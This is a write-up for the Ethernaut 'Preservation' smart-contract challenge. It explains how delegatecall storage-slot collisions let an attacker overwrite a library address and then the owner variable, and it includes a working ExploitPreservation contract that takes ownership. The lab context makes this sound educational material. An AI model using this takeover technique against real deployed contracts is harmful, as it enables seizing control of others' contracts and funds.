Writeup for Preservation

  • Hello h4ck3r, welcome to the world of smart contract hacking. Solving the challenges from Ethernaut will help you understand Solidity better. Each challenge involves deploying a contract and exploiting its vulnerabilities. If you’re new to Solidity and haven’t deployed a smart contract before, you can learn how to do so using Remix here.

Challenge Description

This contract utilizes a library to store two different times for two different timezones. The constructor creates two instances of the library for each time to be stored.

The goal of this level is for you to claim ownership of the instance you are given.

Things that might help

  • Look into Solidity’s documentation on the delegatecall low-level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
  • Understand what it means for delegatecall to be context-preserving.
  • Understand how storage variables are stored and accessed.
  • Understand how casting works between different data types.

Contract Explanation

If you understand the contract, you can move on to the exploit part. If you’re a beginner, please read the Contract Explanation to gain a better understanding of Solidity.

Click to view source contract
 1// SPDX-License-Identifier: MIT
 2pragma solidity ^0.8.0;
 4contract Preservation {
 5    // public library contracts
 6    address public timeZone1Library;
 7    address public timeZone2Library;
 8    address public owner;
 9    uint256 storedTime;
10    // Sets the function signature for delegatecall
11    bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));
13    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
14        timeZone1Library = _timeZone1LibraryAddress;
15        timeZone2Library = _timeZone2LibraryAddress;
16        owner = msg.sender;
17    }
19    // set the time for timezone 1
20    function setFirstTime(uint256 _timeStamp) public {
21        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
22    }
24    // set the time for timezone 2
25    function setSecondTime(uint256 _timeStamp) public {
26        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
27    }
30// Simple library contract to set the time
31contract LibraryContract {
32    // stores a timestamp
33    uint256 storedTime;
35    function setTime(uint256 _time) public {
36        storedTime = _time;
37    }
There are two contracts in the challenge: Preservation and LibraryContract. First, I will explain LibraryContract.

LibraryContract has a state variable named storedTime of type uint256. The value of storedTime will be updated in the setTime() function.

1function setTime(uint256 _time) public {
2    storedTime = _time;

The above function named setTime() takes a uint256 argument as input. Whenever the function is called, it will change the value of storedTime.

The contract Preservation has the following state variables: timeZone1Library of type address, timeZone2Library of type address, owner of type address, storedTime of type uint256, and setTimeSignature of type bytes4.

setTimeSignature is initialized with the function selector of the setTime() function.

1constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
2    timeZone1Library = _timeZone1LibraryAddress;
3    timeZone2Library = _timeZone2LibraryAddress;
4    owner = msg.sender;

The constructor takes two arguments of type address as input and sets the timeZone1Library and timeZone2Library with the addresses passed as inputs. It also sets the owner to msg.sender (the contract deployer). timeZone1Library and timeZone2Library are instances of LibraryContract.

1function setFirstTime(uint256 _timeStamp) public {
2    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));

The function setFirstTime() takes a uint256 as an argument and makes a delegate call to timeZone1Library with the data as the function selector of the setTime() function and the timestamp passed to setFirstTime().

1function setSecondTime(uint256 _timeStamp) public {
2    timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));

The function setSecondTime() takes a uint256 as an argument and makes a delegate call to timeZone1Library with the data as the function selector of the setTime() function and the timestamp passed to setSecondTime().

Both of the above functions will make a delegate call to LibraryContract by calling the setTime() function.

Key Concepts To Learn

To exploit this challenge, we need to dive deep into how a delegate call works.

I hope you have solved the Delegation challenge. If not, click here to solve the challenge. There, I have explained the difference between call, delegatecall, and staticcall.

Check the below example.

 2// SPDX-License-Identifier: MIT
 3pragma solidity ^0.8.0;
 5contract contract_one{
 6    bool public locked;
 7    uint256 public Number;
 9    function unlock()public{
10        locked=false;
11    }
13    function changeNumber(uint256 _num)public{
14        Number=_num;
15    }
18contract contract_two{
19    bool public locked=true;
20    uint256 public Number=78;
21    contract_one contract_One;
22    constructor(address _addr){
23        contract_One =contract_one(_addr);
24    }
26    function Change_Number(uint256 _num)public{
27        (bool success, bytes memory data) = address(contract_One).delegatecall(abi.encodeWithSignature("changeNumber(uint256)",_num));
28        require(success,"Call failed");
29    }
31    function Unlock()public{
32        (bool success, bytes memory data) = address(contract_One).delegatecall(abi.encodeWithSignature("unlock()"));
33        require(success,"Call failed");
34    }

Try out this example in Remix. It will help you understand delegate calls better. If you have no idea about delegate calls, check my write-up for the Delegation challenge.

The Change_Number() function in contract_two makes a delegate call to contract_one, calling the changeNumber() function in contract_one. The changeNumber() function in contract_one will set the variable Number to the argument passed during the call. However, since it is a delegate call, the variable Number won’t be changed in contract_one; it will be changed in contract_two.

Okay, we can understand that when we make a delegate call from one contract to another contract, the state changes will be done in the calling contract and the logic execution will be done in the called contract.

In our example, it is changing the Number, but how does it work? How can contract_one know where the state variable Number is located?

Simply put, it works based on storage layout. Two contracts should have the same storage layout. If we check our example, contract_one has state variables bool and uint256, and contract_two has state variables bool, uint256, and contract_one. So when contract_two makes a delegate call to contract_one and the function changes Number, it will update the uint256 variable. Since contract_two also has a uint256 at the same position, it will be updated in contract_two.

 2// SPDX-License-Identifier: MIT
 3pragma solidity ^0.8.0;
 5contract contract_one{
 6    bool public locked;
 7    uint256 public Number;
 9    function unlock()public{
10        locked=false;
11    }
13    function changeNumber(uint256 _num)public{
14        Number=_num;
15    }
18contract contract_two{
19    contract_one public contract_One;
20    bool public locked=true;
21    uint256 public Number=78;
22    constructor(address _addr){
23        contract_One =contract_one(_addr);
24    }
26    function Change_Number(uint256 _num)public{
27        (bool success, bytes memory data) = address(contract_One).delegatecall(abi.encodeWithSignature("changeNumber(uint256)",_num));
28        require(success,"Call failed");
29    }
31    function Unlock()public{
32        (bool success, bytes memory data) = address(contract_One).delegatecall(abi.encodeWithSignature("unlock()"));
33        require(success,"Call failed");
34    }

In our contract_two, instead of using contract_one as the third state variable, if we use it as the first variable, when we delegate call to the unlock() function in contract_one, it will assume that the first variable is a bool and make changes. But in our contract_two, the first variable is of type contract_one. When the unlock() function makes changes, it will directly overwrite the contract_One.

Try out the above example. Deploy two contracts. While deploying, pass the address of contract_one to the constructor of contract_two. Once it is deployed, check the value stored in the variable contract_One in contract_two. Then call the Unlock() function in contract_two. Once the call is done, check the value stored in the variable contract_One in contract_two. You will observe that the last byte has been overwritten to 00 (false).

I hope you understand how delegate calls work.


Our goal is to claim ownership of the contract.

1function setFirstTime(uint256 _timeStamp) public {
2    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));

When we call the above function, it makes a delegate call to LibraryContract, calling the function setTime(). Since it is a delegate call, if setTime() makes any changes to state variables, those changes will be done in the Preservation contract.

1function setTime(uint256 _time) public {
2    storedTime = _time;

The function setTime() will set the storedTime to the argument passed during the function call. If we check the LibraryContract, the variable storedTime is in slot0. If we check the slot0 in the Preservation contract, we can find timeZone1Library. So when we call setFirstTime() with an argument as a uint in the Preservation contract, because of the delegate call, it will change the value at slot0 in the Preservation contract to the timestamp passed to setFirstTime() during the call.

So while calling setFirstTime(), instead of passing time as an argument, if we pass an address converted into a uint256, the next time we make a call to setFirstTime(), it will make a delegate call to our address. This is because in the setFirstTime() function, the address of the callee is retrieved from timeZone1Library. Since the address is changed, it will make a call to whatever address is stored in timeZone1Library.

So when we call the setFirstTime() for the first time, we pass our exploit contract address. We need to write our exploit contract such that it should have a setTime() function since the delegate call is made to call the setTime() function, and the exploit contract’s storage layout should be the same as the Preservation contract.

It’s not necessary to make the storage layout exactly the same as the Preservation contract, but we need to make sure that the second slot is an address because the owner in the Preservation contract is in slot2.

 1// SPDX-License-Identifier: MIT
 2pragma solidity ^0.8.0;
 4import {Preservation} from "./Preservation.sol";
 6contract ExploitPreservation{
 7    Preservation preservation;
 8    uint256 addr=uint160(address(this));
 9    address public owner;
11    constructor(address _addr){
12        preservation=Preservation(_addr);
13    }
15    function setTime(uint256 _time)public{
16        owner= // __YOUR__CONTRACT__ADDRESS;
17    }
19    function Exploit()public{
20        preservation.setFirstTime(addr);
21        preservation.setFirstTime(addr);
22    }

In the setTime() function, first it calls setFirstTime() with our exploit contract address. Once the first line is executed, timeZone1Library is set to our exploit contract address. When the second line is executed, the next call will be made to our exploit contract, calling the setTime() function. In the setTime() function in our exploit contract, we are changing the value at slot2, so it will change the value at slot2 in the Preservation contract. In the Preservation contract, slot2 is used for the owner’s address. Once the Exploit() call is done, our challenge will be completed.

Don’t forget to change the address of the owner in the setTime() function in the ExploitPreservation contract to your wallet address.

Once the calls are done, you can check whether the owner is changed or not by entering the following in the console:

1> await contract.owner()

You have learned a lot of things. Make sure you understand everything clearly, especially delegate calls.

Key Takeaways

When using delegate calls, it is important to ensure that the two contracts have the same storage layout. This means that the variables in both contracts should be in the same order and have the same data types. By doing so, the delegate call can correctly access and modify the desired variables in the calling contract.

Additionally, understanding how delegate calls work and their implications is crucial. Delegate calls allow for the execution of code from another contract while preserving the context of the calling contract. This means that state changes will occur in the calling contract, but the logic execution will happen in the called contract.

By leveraging delegate calls effectively, you can exploit vulnerabilities and manipulate the state of contracts to achieve desired outcomes, such as claiming ownership or executing specific functions.

Remember to thoroughly understand the concepts and practice with examples to solidify your understanding of delegate calls and their usage in smart contract development.

***Hope you enjoyed this write-up. Keep on hacking and learning!***